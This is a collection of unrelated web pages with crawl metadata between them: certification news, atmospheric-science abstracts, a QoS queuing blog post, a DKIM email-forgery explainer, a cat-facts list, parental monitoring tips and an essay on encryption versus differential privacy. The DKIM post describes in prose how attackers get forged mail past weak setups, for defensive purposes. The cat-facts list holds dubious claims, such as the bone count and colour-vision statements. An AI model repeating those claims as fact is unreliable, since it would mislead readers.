While upgrading the exam, INCOSE also added a specialization option in Department of Defense acquisition (CSEP Acq). This exam, which must be completed either concurrently or after passing the core CSEP exam, validates knowledge of systems engineering within a U.S. Department of Defense (DOD) acquisition environment. This certification is ideal for both current DOD professionals — to help them climb the career ladder — and industry professionals who work on government contracts and want to highlight their credibility and understanding of the DOD development process.
Also new to INCOSE certifications is the entry-level Associate Systems Engineering Professional (ASEP). The ASEP certification requires passing the same exam for the CSEP, as well as a bachelor’s degree, only the ASEP does not require an experience component. The ASEP is good for up to 10 years, by which time INCOSE expects the professional to have upgraded to CSEP status.
And for seasoned systems engineers, INCOSE will unveil its Expert Systems Engineering Professional (ESEP) certification in 2009.
“ESEP is targeted for a very limited audience of senior leaders in system engineering,” Walden explained. “And the way that we [will validate] that is not through a knowledge exam, but through a detailed interview process with the applicant and [his or her] references.”
In order for the credentials to be renewed — which is every three years for CSEP and five for ASEP — INCOSE certifications also require participation in continuing learning experiences within an allotted time period.
“The two main ways that you can earn PDUs [professional development units] are through taking some type of professional development such as university courses [or] internal training courses, [or] through volunteering,” which can include giving a paper at a systems engineering event or working on a professional standards committee, Walden said.
“The reason that we have a requirement for renewal is we want this to be a lifelong learning process,” he said.
– Mpolakowski, email@example.com “ | <urn:uuid:a56cc605-76bb-4ab8-8a4f-86783fd90549> | CC-MAIN-2017-04 | http://certmag.com/incose-systems-engineer-certs-offer-broad-based-skills-validation/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281574.78/warc/CC-MAIN-20170116095121-00488-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.951683 | 977 | 2.53125 | 3 |
Elias T.,EuraTechnologies |
Dupont J.-C.,Institute Pierre Simon Laplace |
Hammer E.,Paul Scherrer Institute |
Hammer E.,Grolimund Partner Ltd. |
And 5 more authors.
Atmospheric Chemistry and Physics | Year: 2015
The study assesses the contribution of aerosols to the extinction of visible radiation in the mist-fog-mist cycle. Relative humidity is large in the mist-fog-mist cycle, and aerosols most efficient in interacting with visible radiation are hydrated and compose the accumulation mode. Measurements of the microphysical and optical properties of these hydrated aerosols with diameters larger than 0.4 μm were carried out near Paris, during November 2011, under ambient conditions. Eleven mist-fog-mist cycles were observed, with a cumulated fog duration of 96 h, and a cumulated mist-fog-mist cycle duration of 240 h. In mist, aerosols grew by taking up water at relative humidities larger than 93%, causing a visibility decrease below 5 km. While visibility decreased down from 5 to a few kilometres, the mean size of the hydrated aerosols increased, and their number concentration (Nha) increased from approximately 160 to approximately 600 cmg'3. When fog formed, droplets became the strongest contributors to visible radiation extinction, and liquid water content (LWC) increased beyond 7 mg mg'3. Hydrated aerosols of the accumulation mode co-existed with droplets, as interstitial non-activated aerosols. Their size continued to increase, and some aerosols achieved diameters larger than 2.5 μm. The mean transition diameter between the aerosol accumulation mode and the small droplet mode was 4.0 ± 1.1 μm. Nha also increased on average by 60 % after fog formation. Consequently, the mean contribution to extinction in fog was 20 ± 15% from hydrated aerosols smaller than 2.5 μm and 6 ± 7% from larger aerosols. The standard deviation was large because of the large variability of Nha in fog, which could be smaller than in mist or 3 times larger.
The particle extinction coefficient in fog can be computed as the sum of a droplet component and an aerosol component, which can be approximated by 3.5 Nha (Nha in cmg'3 and particle extinction coefficient in Mmg'1. We observed an influence of the main formation process on Nha, but not on the contribution to fog extinction by aerosols. Indeed, in fogs formed by stratus lowering (STL), the mean Nha was 360 ± 140 cmg'3, close to the value observed in mist, while in fogs formed by nocturnal radiative cooling (RAD) under cloud-free sky, the mean Nha was 600 ± 350 cmg'3. But because visibility (extinction) in fog was also lower (larger) in RAD than in STL fogs, the contribution by aerosols to extinction depended little on the fog formation process. Similarly, the proportion of hydrated aerosols over all aerosols (dry and hydrated) did not depend on the fog formation process.
Measurements showed that visibility in RAD fogs was smaller than in STL fogs due to three factors: (1) LWC was larger in RAD than in STL fogs, (2) droplets were smaller, (3) hydrated aerosols composing the accumulation mode were more numerous. © Author(s) 2015. CC Attribution 3.0 License. Source
Laufkotter C.,ETH Zurich |
Laufkotter C.,Princeton University |
Vogt M.,ETH Zurich |
Gruber N.,ETH Zurich |
And 18 more authors.
Biogeosciences | Year: 2015
Past model studies have projected a global decrease in marine net primary production (NPP) over the 21st century, but these studies focused on the multi-model mean rather than on the large inter-model differences. Here, we analyze model-simulated changes in NPP for the 21st century under IPCC's high-emission scenario RCP8.5. We use a suite of nine coupled carbon-climate Earth system models with embedded marine ecosystem models and focus on the spread between the different models and the underlying reasons. Globally, NPP decreases in five out of the nine models over the course of the 21st century, while three show no significant trend and one even simulates an increase. The largest model spread occurs in the low latitudes (between 30° S and 30° N), with individual models simulating relative changes between-25 and +40 %. Of the seven models diagnosing a net decrease in NPP in the low latitudes, only three simulate this to be a consequence of the classical interpretation, i.e., a stronger nutrient limitation due to increased stratification leading to reduced phytoplankton growth. In the other four, warming-induced increases in phytoplankton growth outbalance the stronger nutrient limitation. However, temperature-driven increases in grazing and other loss processes cause a net decrease in phytoplankton biomass and reduce NPP despite higher growth rates. One model projects a strong increase in NPP in the low latitudes, caused by an intensification of the microbial loop, while NPP in the remaining model changes by less than 0.5 %. While models consistently project increases NPP in the Southern Ocean, the regional inter-model range is also very substantial. In most models, this increase in NPP is driven by temperature, but it is also modulated by changes in light, macronutrients and iron as well as grazing. Overall, current projections of future changes in global marine NPP are subject to large uncertainties and necessitate a dedicated and sustained effort to improve the models and the concepts and data that guide their development. © 2015 Author(s). Source
Beekmann M.,University Paris Est Creteil |
Baltensperger U.,Paul Scherrer Institute |
Borbon A.,University Paris Est Creteil |
Sciare J.,French Climate and Environment Sciences Laboratory |
And 110 more authors.
HARMO 2010 - Proceedings of the 13th International Conference on Harmonisation within Atmospheric Dispersion Modelling for Regulatory Purposes | Year: 2010
Within the FP7 MEGAPOLI project, two intensive field campaigns have been conducted in the Greater Paris region during July 2009 and January/February 2010. The major aim was to quantify sources of primary and secondary aerosol, and the interaction with gaseous precursors, in and around a large agglomeration in temperate latitudes. From this campaign, a comprehensive data set will be built which will be available for urban and regional scale air quality model evaluation. The paper will present campaign objectives and set-up, first results, and specific benchmarks, which should be most useful for model evaluation. Source
Wattrelot E.,Center National Of Recherche Meteorologique |
Caumont O.,Center National Of Recherche Meteorologique |
Mahfouf J.-F.,Center National Of Recherche Meteorologique
Monthly Weather Review | Year: 2014
This paper presents results from radar reflectivity data assimilation experiments with the nonhydrostatic limited-area model Application of Research to Operations at Mesoscale (AROME) in an operational context. A one-dimensional (1D) Bayesian retrieval of relative humidity profiles followed by a three-dimensional variational data assimilation (3D-Var) technique is adopted. Several preprocessing procedures of raw reflectivity data are presented and the use of the nonrainy signal in the assimilation is widely discussed and illustrated. This two-step methodology allows the authors to build up a screening procedure that takes into account the evaluation of the results from the 1D Bayesian retrieval. In particular, the 1D retrieval is checked by comparing a pseudoanalyzed reflectivity to the observed reflectivity. Additionally, a physical consistency between the reflectivity innovations and the 1D relative humidity increments is imposed before assimilating relative humidity pseudo-observations with other observations. This allows the authors to counteract the difficulty of the current 3D-Var system to correct strong differences between model and observed clouds from the crude specification of background-error covariances. Assimilation experiments of radar reflectivity data in a preoperational configuration are first performed over a 1-month period. Positive impacts on short-term precipitation forecast scores are systematically found. The evaluation shows improvements on the analysis and also on objective conventional forecast scores, in particular for the model wind field up to 12 h. A case study for a specific precipitating system demonstrates the capacity of the method for improving significantly short-term forecasts of organized convection. © 2014 American Meteorological Society. Source | <urn:uuid:82a63169-c36d-4a76-ba7e-08c10d44b65c> | CC-MAIN-2017-04 | https://www.linknovate.com/affiliation/center-national-of-recherche-meteorologique-1487803/all/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560283475.86/warc/CC-MAIN-20170116095123-00396-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.904134 | 1,834 | 3.015625 | 3 |
In part 8 of this series we are going to unravel the mysteries of congestion management and its four main queuing methods.
Congestion is the result of many factors and can occur in many places on the network. A few of the reasons for congestion are traffic aggregation points, network transit points, speed mismatches, oversubscription, and insufficient packet buffers. Aggressive traffic can fill interface queues and starve more time sensitive flows such as voice and video. Increasing bandwidth is not an adequate fix to solve these issues. By using queuing algorithms to sort traffic and determine a method of prioritizing traffic, the routers can solve specific network traffic issues which in turn can increase network performance.
There are two hardware components; hardware and software. Hardware queuing always uses FIFO queueing, and software queueing is used if the hardware queue is full. A full hardware queue indicates interface congestion and a software queue is used to manage that congestion.
To control congestion, the device using the congestion management tools must determine the buffer queues the packets are to be queued in and what order in which packets are sent out an interface based on the priority assigned to those packets. Congestion management tools must perform these tasks to function as suggested.
- Create Queues
- Assign packets to queues based on the packet classification
- Schedule the packets for transmission
There are four types of queuing mechanisms in the congestion management feature set. Each mechanism is fully customizable to specify different number of queues and the order in which the traffic is serviced. Only one queueing mechanism type is allowed to be configured on each interface.
In times of no congestion, packets are sent out the interface as soon as they arrive. During times of congestion when packets are arriving faster than the interface can send them, the congestion management tools queue the packets in buffers based on their classification and are scheduled based on the algorithm of that particular queuing method. The router determines the order of packet transmission by controlling which packets are placed in which queue and how queues are serviced with respect to each other.
Following are the four types of queueing, which constitute the congestion management QoS features. The queueing types are listed here and will be fully discussed in the next few entries of this blog series.
- FIFO (first-in, first-out) entails no concept of priority or classes of traffic. With FIFO, transmission of packets out the interface occurs in the order the packets arrive.
- Custom queueing (CQ) allocates bandwidth proportionally for each different class of traffic. CQ allows for the specification of the number of bytes or packets to be drawn from the queue. This is especially useful on slow interfaces.
- Priority queueing (PQ) sends packets belonging to one priority class of traffic before all lower priority traffic to ensure timely delivery of those packets.
- Weighted fair queueing (WFQ) offers dynamic, fair queueing that divides bandwidth across queues of traffic based on weights. WFQ ensures that all traffic is treated fairly, given its weight.
To understand how WFQ works, consider the queue for a series of File Transfer Protocol (FTP) packets as a queue for the collective and the queue for discrete interactive traffic packets as a queue for the individual. Given the weight of the queues, WFQ ensures that for all FTP packets sent as a collective an equal number of individual interactive traffic packets are sent.
Given this handling, WFQ ensures satisfactory response time to critical applications, such as interactive, transaction-based applications that are intolerant of performance degradation.
There are four types of WFQ:
- Flow-based WFQ (WFQ)
- Distributed WFQ (DWFQ)
- Class-based WFQ (CBWFQ)
- Distributed class-based WFQ (DCBWFQ)
For serial interfaces at E1 (2.048 Mbps) and below, flow-based WFQ is used by default. When no other queueing strategies are configured, all other interfaces use FIFO by default.
Author: Paul Stryer
- Cisco IOS Quality of Service Solutions Configuration Guide, Release 12.4T
- End-To-End QoS network Design, by Tim Szigeti and Christina Hattingh – ISBN # 1-58705-176-1
- DiffServ – The Scalable End-To-End QoS Model
- Integrated Services Architecture
- Definition of the Differentiated Services Field
- An Architecture for Differentiated Services
- Requirements for IP Version 4 Routers
- An Expedited Forwarding PHB (Per-Hop Behavior) | <urn:uuid:97f8988a-73bf-42d1-a053-880a6e0e17fc> | CC-MAIN-2017-04 | http://blog.globalknowledge.com/2010/01/22/qos-part-8-congestion-management/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280835.22/warc/CC-MAIN-20170116095120-00516-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.914474 | 961 | 3.40625 | 3 |
Stopping Forged Email 2: DKIM to the Rescue
We have recently looked at how hackers and spammers can send forged email and then seen how these forged messages can be almost identical to legitimate messages from the purported senders. In fact, we learned that generally all you can trust in an inbound email message is the internet IP address of the server talking to your inbound email server — as this cannot realistically be forged in any way that would still enable you to receive the message.
In our last post in this series, we examined how SPF can be used to help weed out forged email messages based on validating if a message was sent by an approved server by looking at the IP address delivering the email message to you. We found that while SPF can work, it has many significant limitations that cause it to fall far short of being a panacea.
So — besides looking at the sending server IP address — what else can we do to determine of a message was forged?
It turns out that there is another way — through the use of encryption techniques and digital signatures — to have the sender’s servers transparently “sign” a message in a way that you can verify upon receipt. This is called DKIM.
DKIM – Domain Keys Identified Mail: A Simple Explanation
DKIM stands for “Domain Keys Identified Mail” … or, re-writing this more verbosely, “Domain-wide validation Mail Identity through use of cryptographic Keys”. To understand DKIM, we need to back up for a second and look at what we mean by “cryptographic keys” and how that can be used.
In security, there is a concept called symmetric encryption that everyone is familiar with: you pick a password and use some “cipher” to convert a regular (plaintext) message into an encrypted (ciphertext) message. Someone else who knows the password and cipher can reverse the process to get the regular message back.
Another extremely common (e.g. it is the basis for SSL, TLS, S/MIME, PGP and other security technologies), but more complex method is asymmetric encryption. In asymmetric encryption, one can create a “key pair” … a combination of a 2 keys. A message encrypted using Key 1 can only be decrypted with Key 2 and vice versa. We typically call Key 1 our “private key” because we keep that safe and secret. We are happy to publish “Key 2” to the world.
What does that buy you?
- Signatures: Anything that you encrypt using Key 1 can be decrypted by anyone. But if they can decrypt it, that proves that you sent it (as only you have your secret key and thus “only you” could have encrypted it).
- Encryption: Anyone can use your public key to encrypt a message that can only be opened by you (using your secret key).
DKIM uses the cool feature asymmetric encryption for signing messages. Here is how it works (a hand waving overview that leaves out many details for the sake of clarity):
- Make a Key Pair: The folks in charge of the sender’s servers create a cryptographic key pair
- Publish the Public Key: These same folks publish the public key in the DNS for their domain
- Sign Messages: Using the private key, the sender’s servers look at selected message headers (e.g. the sender name and address, the subject, the message ID) and the message body, they use a cryptographic “hash” function to make a unique “fingerprint” of this info (e.g. so that any change to that info would change the fingerprint). This fingerprint hash is encrypted using the private key and this “fingerprint” as added to the message as a new header called “DKIM-Signature”.
Now, when you receive a message that is signed using DKIM, you know the purported sender, the IP address the message came from and you have this additional “DKIM-Signature.” However, you cannot trust that this signature header is real or has not been tampered with. Fortunately, you do not have to trust it blindly; DKIM allows you to verify it. Here is what happens on the recipient’s side:
- Receipt: The recipient’s inbound email server receives the message
- Get the Signature: The encrypted DKIM fingerprint is detected and extracted from the message headers
- Get the Key: The sender’s purported domain is known; the recipients server looks in DNS to get the sender domain’s public DKIM encryption key
- Decryption: The fingerprint is decrypted using the public key.
- Fingerprint Check: The recipient then uses the message body and the same headers as the sender to make another fingerprint. If the fingerprints match … then the message has not been altered since it was sent.
So, this buys you sender identity verification by:
- We know that the message was not modified since it was sent — so the name and the address of the sender (among other things) is the same as it was when it was sent.
- We know that the message was sent by a server authorized for sending email for the sender’s domain — as that server used the DKIM private key for that domain.
So, through encryption, we have a way to verify that the message was sent by a server authorized to send email fro the sender’s domain … and thus we have a “solid” reason to believe the sender’s identity. Furthermore, this validation does not rely on server IP addresses at all, and thus does not share the weaknesses of SPF.
Setting up DKIM
With DKIM (as with all anti-fraud solutions for email), it is up to the owner of a domain (e.g. the owner of bankofamerica.com) to setup the DNS settings required for DKIM to be checked by the recipients. If they do not do this, then there is no way to verify DKIM and any DKIM signatures on messages will be ignored.
DKIM is set up by adding special entries to the published DNS settings for the domain. You can use a tool, such as this DKIM Generator, to create create your DKIM cryptographic keys and tell you what you should enter in to DNS. Your email provider may have their own tools that assist with this process — as the private key needs to be installed on their mail servers and use of DKIM has to be enabled; we recommend asking your email provider for assistance.
We are not going to spend time on the details of the configuration or setup here; instead we will look at the actual utility of DKIM and where it falls on its face and how attackers can get around it.
DKIM – The Good Parts
Once DKIM has been set up and is used by your sending mail servers, it does an amazing job with anti-fraud…. generally much better than SPF. It also helps ensure that messages have not been modified at all since they were sent … so we can be sure of who sent the message and of what they said; SPF does not provide any kind of assurance that messages were not modified.
Use of DKIM is highly recommended for every domain owner and for every email filtering system.
However, as we shall see next, its not time to throw a party celebrating the end of fraudulent email.
DKIM – Its Limitations
Domain Keys Identified Mail has sone significant limitations in the battle against fraud:
It can be hard to identify and set up all authorized servers
For proper use of DKIM, all servers that send email for your domain must be able to use DKIM and have keys for your domain. This can be difficult if you have vendors or partners that send email for you using your domain or if you otherwise can not be sure that all messages sent will be signed.. In such cases, if you cannot get them to use DKIM, you should have them send email for you using a different domain or a subdomain, so that your main domain can be fully DKIM-enabled and its DNS can tell everyone that DKIM signatures must be present on all messages. E.g. you want to be “strict” with DKIM usage in a way that is hard to do with SPF.
If you cannot be strict, then DKIM allows you to be soft … indicating that signatures may or may not be present. In such cases (like with SPF), the absence of a DKIM signature does not make a message invalid; the presence of a valid signature just makes the message certainly valid. If your DKIM setup is “soft”, forgery is simple.
DKIM checks only the domain name and the server.
If there are two different people in the same organization, Fred@domain.com and Jane@domain.com — either of them can send email legitimately from their @domain.com address using the servers they are authorized to use for domain.com email.
However, if Fred@domain.com uses his account to send a message forged to be from Jane@domain.com — DKIM will check out as “OK” … even if DKIM is set as strict.
DKIM does not protect against inter-domain forgery at all.
Note: using separate DKIM selectors and keys for each unique sender would resolve this problem (and the next one); but this is rarely done.
Same Email Provider: Shared Servers Forgery?
This is a generalization to inter-domain forgery. If Fred@badguy.com and Jane@goodguy.com were using the same email service provider and the same servers, Jane’s goodguy.com domain is setup with DKIM, and the email provider’s servers are also setup to sign messages from @goodguy.com with appropriate DKIM signatures, what happens when Feed@badguy.com logs in to his account and sends a message pretending to be from Jane?
The answer depends on the email provider!
- The provider could prevent Fred from sending email purporting to be from anyone except himself. This would solve the problem right away but is very restrictive and many providers do not do this.
- The provider could associate DKIM keys to specific users or accounts (this is what LuxSci does) … so Fred’s messages would never be signed by valid the “goodguy.com” DKIM keys, no matter what. This also solves the problem.
However, if the provider’s servers are not restrictive in one of these (or a similar way), then Fred’s forged email messages will be DKIM-signed with the goodguy.com signature and will look DKIM-valid.
Legitimate Message Modification
DKIM is very sensitive to message modification; DKIM signature checks will come back “invalid” if even 1 character has been changed. This is generally good, but it is possible that some filtering systems read and “re-write” messages in transit where the “real” message content is unchanged but certain (MIME) “metadata” is replaced with new data (e.g. the unique strings that separate message parts). This breaks DKIM and it can happen more frequently that you might expect.
Good spam filters check DKIM before modifying messages; but if you have multiple filtering systems scanning messages, then the DKIM checks of later filters may be broken by the actions of earlier filters.
DKIM does not really protect against Spam
This is not a limitation of DKIM, but worth noting anyway. All DKIM does is help you identify if a message is forged or not (and if it has been altered or not). Most Spammers are savvy. They use their own legitimate domain names and create valid DKIM (and DPF and DMARC) records so that their email messages look more legitimate.
In truth this does not make them look less spammy; it just says that the messages are not forged.
Of course, if the spammer is trying to get by your filters by forging the sender address so that the sender is “you” or someone you know, then DKIM can absolutely help.
For further DKIM issues and misconceptions, see: 7 common misconceptions about DKIM in the fight against Spam.
How Attackers Subvert DKIM
So, in the war of escalation where an attacker is trying to get a forged email message into your INBOX, what tricks do they use to get around sender identity validation by DKIM?
The protections afforded by DKIM are more significant than those provided by SPF. From an attacker’s perspective, it all comes down to what sender email address (and domain) they are forging. Can they pick an address to construct an email that you will trust that will make it past DKIM?
- If the sender address does not support DKIM at all — the attacker is “all set”.
- If your DKIM is set up as “weak“, then the attacker can send a forged message with a missing DKIM signature and it will look legitimate.
- If the attacker can send you a message from one of the servers authorized by the DKIM for the domain and if that server does not care who initiated the message … but will sign any messages going through it with the proper DKIM keys, then the message will look legitimate. E.g. If the attacker signs up with the same email provider as that used by the forged domain and that provider’s servers do not restrict DKIM key usage, then s/he can send an email from those same servers are the legitimate account and have his/her messages properly signed. This makes the attacker’s email look “Good” even if the forged domain’s DKIM records are “strict”.
An attackers options are much more limited with DKIM. S/he can only send fraudulent messages from domains with no or weak DKIM support, or send through non-restrictive shared email servers, or steal the private key used by the sender’s DKIM, or s/he must actually compromise the email account of someone using the same email domain as address that is to be faked.
The situation is better, but not perfect … especially as many organizations leave their DKIM configuration as “weak” as they would rather take a chance on forged email rather than have legitimate messages be missed or discarded due to inadvertent message modification or because they were sent from a server without DKIM.
We will see in our next post how one can use DMARC to combine the best features of DKIM and SPF to further enhance forged email detection…. and where the gaps that attackers use still remain. | <urn:uuid:d4836f37-9b44-499f-becb-e3ae0940547d> | CC-MAIN-2017-04 | https://luxsci.com/blog/stopping-forged-email-2-dkim-rescue.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560281202.94/warc/CC-MAIN-20170116095121-00424-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.92845 | 3,097 | 2.59375 | 3 |
Amazing Facts About Cats - 25 Interesting Facts About Cats
Here is a collection of amazing facts about cats.
Amazing Facts About Cats
- The nose pad of a cat is ridged in a pattern that is unique, just like the fingerprint of a human.
- Cats have 290 bones and 517 muscles in their body.
- Cats are born with blue eyes. They change at approximately 12 weeks of age.
- During her productive life, one female cat could have more than 100 kittens.
- The biggest breed of domesticated cats are called a Maine Coon cat and weighs up to 11 kg.
- Purring doesn't necessarily mean a cat is happy. Sometimes cats will purr when they are scared or hurt.
- A cat's IQ is only surpassed by that of monkeys and chimps in the world of animals.
- Cat's sense of smell is 14 times stronger than ours. This means they can smell the odour in the litter box much earlier than us.
- Cats have 30 permanent teeth, while adult humans have 32.
- Killing a cat was punishable by death in acient Egypt.
- There are more than 500 million domestic cats in the world, with 33 different breeds.
- The average age for an indoor cat is 15 years, while the average age for an outdoor cat is only 3 to 5 years.
- A cat uses it's whiskers to tell if the space they are contemplating entering is big enough for them.
- Cat urine glows in the dark if a black light is shined on it. This is a good way to detect cat urine in your home.
- A cat's hearing is much stronger and more sensitive than a dog's or a human's. Our hearing stops at 20 khz; a cat's at 65 khz.
- Cats often have a third eyelid that is not normally visible to us. If you are seeing it more often – the cat may be.
- A cat's heart beats twice as fast as a human heart, at 110 to 140 beats per minute.
- Cats are partially color blind. They have the equivalency of human red/green color blindness. (Reds appear green and greens appear red; or shades thereof.)
- Cats don't see detail very well. The person may appear hazy when standing in front of them.
- Cats can jump between 5 & 7 times as high as their tail.
- Only about 80% of cats have the gene that allows them to respond to the effects of catnip. The other 20% are not affected by it.
- Your cat loves you and can read your moods. If you're sad or under stress, you may also notice a difference in your cat's behavior.
- Cats are the sleepiest of all mammals. They spend 16 hours of each day sleeping. With that in mind, a seven year old cat has only been awake for two years of its life!
- Sometimes your cat will find it difficult to find the treats you throw him on the floor. The reason is because cats can't see directly under their own nose.
- A cat will almost never meow at another cat. This sound is reserved for humans.
This list is based on the content of the title and/or content of the article displayed above which makes them more relevant and more likely to be of interest to you.
We're glad you have chosen to leave a comment. Please keep in mind that all comments are moderated according to our comment policy, and all links are nofollow. Do not use keywords in the name field. Let's have a personal and meaningful conversation.comments powered by Disqus | <urn:uuid:dd6fbaf0-553a-4a83-b0d0-357c79aff51c> | CC-MAIN-2017-04 | http://www.knowledgepublisher.com/article-976.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560279468.17/warc/CC-MAIN-20170116095119-00058-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.957633 | 752 | 3.265625 | 3 |
Internet Safety For Kids: How to Monitor Your Kids Online Activities
Imagine that you have a 14-year-old daughter. Perhaps you do, in fact. Do you know what she is doing online? Is there a possibility that she is corresponding with someone she shouldn’t be? Do you think you are watching the internet habits of your child(ren) closely enough?
A recent survey has found that almost 70 percent of teens report that they know how to hide what they do online, and about 80 percent of parents don’t know how to find out what their kids are doing.
This is absolutely frightening.
Some believe that monitoring their children’s online activities is spying, but this is actually called “parenting” and should be a key piece of your internet safety strategy for keeping your kids safe. Instead of looking at the internet as a right, parents should be looking at it as a privilege. There are too many bad guys out there preying on children and teens, and as a parent, you must take an active role in stopping this. Here are a few internet safety tips to help you protect your kids.
- Spend time with your kids online; learn about their habits and who they are interacting with.
- Put your computer in a high-traffic area of the home and set a time limit. If a child has their own laptop, only allow them to use it in certain areas of the home.
- Teach children to recognize online behavior that is inappropriate.
- Invest in software that allows you to control the sites your child visits.
- Remind children to create only appropriate usernames, photographs, and to never reveal personal information to those online.
- Make sure your child understands that you will be checking their devices for offending behavior without warning – and make sure you actually check them.
Software to Help You Monitor Your Children
As mentioned, it is a good idea to use software to monitor what your children are doing online. Here are some of the best:
- Limitly – This software allows you to limit screen time and app use on their mobile device. It is free, but only available for Android.
- Trackidz – This software allows you to track which apps your kids are downloading, manage their time on mobile devices, and track location. The software alerts you when your child turns off their phone, and you can view your child’s contacts.
- Pocket Guardian – With this software, you will get an alert when bullying, sexting, or inappropriate images are detected on your child’s mobile device.
- VISR – To use VISR, you must have access to your child’s usernames and passwords. The software then analyzes emails and social media accounts for suspect behavior such as profanity, bullying, nudity, or even late night use.
- Bark – Like VISR, you must have access to usernames and passwords. It analyzes activity and alerts you when there is a problem.
Things are much different now than when many of us were young, and even very different from when the internet became a household utility. I’m the security expert that the 6 o’clock news keeps calling to speak to about the recurring story that involves an online predator taking advantage of young girls. Protect your kids today, tomorrow and for as long as they are under your immediate care.
Latest posts by Robert Siciliano (see all)
- Increase Email Security and Reduce Your Risk of Being Hacked - January 17, 2017
- Technology and Kids: How to Manage Your Child’s Tech Time - January 10, 2017
- Privacy Tip: Remove EXIF Data From Photos - January 3, 2017
- January 2017
- December 2016
- November 2016
- October 2016
- September 2016
- August 2016
- July 2016
- June 2016
- May 2016
- April 2016
- March 2016
- February 2016
- January 2016
- December 2015
- November 2015
- October 2015
- September 2015
- August 2015
- July 2015
- June 2015
- May 2015
- April 2015
- March 2015
- February 2015
- January 2015
- December 2014
- November 2014
- October 2014
- September 2014
- August 2014
- July 2014
- June 2014
- May 2014
- April 2014
- March 2014
- February 2014
- January 2014
- December 2013
- November 2013
- October 2013
- September 2013
- August 2013 | <urn:uuid:1a7af330-4f74-4ad2-9cef-5ffb47e715fa> | CC-MAIN-2017-04 | https://www.identityforce.com/blog/internet-safety-kids-monitor-kids-online-activities | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280668.34/warc/CC-MAIN-20170116095120-00452-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.9616 | 934 | 2.8125 | 3 |
Written in collaboration with Yunhui Long.
In this time and age, where companies brew money using user data, consumer privacy is at stake. Incessant identity thefts and phishing attacks, and revelations about mass government surveillance have resulted in privacy paranoia among consumers. Consumers have thus come to prefer products and services with stronger privacy postures. To this end, two major privacy technologies have gained immense attention -- End-to-end Encryption and Differential Privacy. While both the technologies strive to protect user privacy, interestingly, when put together, the whole is smaller than the sum of its parts.
Firstly, what exactly are end-to-end encryption and differential privacy?
What is End-to-end Encryption?
End-to-end encryption (E2EE) is a popular privacy technology for instant-messaging services. With this technology, only the communicating users can read the messages. Technically speaking, this works by encoding the sender’s message in such a way that only the receiver has the key to decode it.
Just in the past three years, various messaging apps have implemented end-to-end encryption. Notably, this shield not only protects users from external eavesdroppers, but also ensures that even the company offering the instant-messaging service cannot access the data.
What is Differential Privacy?
Intuitively, differential privacy is a technique that can reveal interesting patterns in a large dataset, while still protecting privacy of individual data entries.
To understand the technique, consider a database of salaries of all Software Engineers in the Silicon Valley. Let us say that an analyst is allowed to access the average of the salaries. Denote the average value by avg1. Let us say that a new item v is added to the database; let the new average be avg2. The analyst can easily decode what v is, just by knowing avg1 and avg2. [v = avg2 * (N+1) – avg1 * N], where N is the total number of salaries in the original database.
Differential privacy avoids such scenarios. More specifically, differential privacy is a statistical learning tool that works by adding carefully computed mathematical noise to the statistical aggregate. In the above example, the noise term added to the average salary does not allow the analyst to learn information about the exact salary of any individual software engineer. The noise term is large enough to mask individual data items, but small enough to allow any patterns in the dataset to appear.
Differential Privacy to Protect User Privacy
Until recently, differential privacy had been a topic of theoretical research without much application in real-world scenarios. Clearly, differential privacy can bring a significant value to the table: In the today’s consumer-driven economy, it’s crucial for businesses to learn and adapt to consumer behavior. Thus, collecting and studying patterns in consumer data has become key ingredient for success survival. The ability to extract patterns from large datasets, while still protecting privacy of individual data points seems to be a boon.
An application of differential privacy: Consider a company C providing an end-to-end encrypted instant-messaging service. A desirable feature of an instant-messaging service is smart autocomplete. To provide this feature, all the data that C needs is just the English dictionary. Now, consider a smart autocomplete feature that also suggests trending slangs even before you have heard of those slangs. Note that the suggestions are specifically based on a population’s messaging behavior. So, clearly, this feature needs consumer data. In such a case, differential privacy might be used to collect and process consumer data, while still preserving individual privacy.
Methodologies for implementing differential privacy: Unfortunately, differential privacy had been confined only to theoretical research, and there isn’t much work on how to employ this in practice. Thus, the exact methodologies of implementing this technology large scale is unclear. A specific interesting question is what exact methodology one should use to sample the noise terms. There are two major methodologies in the literature:
- A prevalent methodology is to first collect the exact data points, compute an aggregate (such as, total count or average) of the collected data points, and then add noise to the aggregate. This necessitates the users sending their exact information to the company C. Thus, while this methodology protects user privacy from the public, the company still gets access to the exact user information. This is undesirable.
- Thankfully, there is another methodology which, although less prevalent, seems to fit the bill: It involves adding noise to the data points at the user end before the data is collected and sent to C’s cloud storage. Then C would aggregate the noised data points. This helps preserve some privacy from C too. A significant research in this area came from Google Research --RAPPOR methodology, and it involves the so-called tools of ‘hashing’ and ‘sub-sampling’.
However, the devil is in the details.
The Devil in the Details
Detail 1: RAPPOR-like techniques would require C to know a set of candidate strings of which C is computing the usage frequency. For concreteness, in the case of trending slangs, C would actually need to know the slangs, that the users are sending through the messaging service, to determine the frequency.
Detail 2: Recall that the conversations are end-to-end encrypted. Also recall that the objective of end-to-end encryption is to have no door through which C can obtain user data (so that C may not be coerced to reveal user data even by government surveillance warrants).
The devil: Detail 1 implied that C needs to look into user data, Detail 2 recalled that the data is already encrypted. In other words, to learn the candidate strings used in differential privacy techniques, the company may need to see the unencrypted content of individuals' conversations, which is against the very intention of end-to-end encryption.
This shows that the two privacy technologies fundamentally tussle with each other. In fact, we have seen that one can seriously backpedal the other. Thus, any methodology that will make these privacy technologies work together will be incredibly non-trivial and ground-breaking.
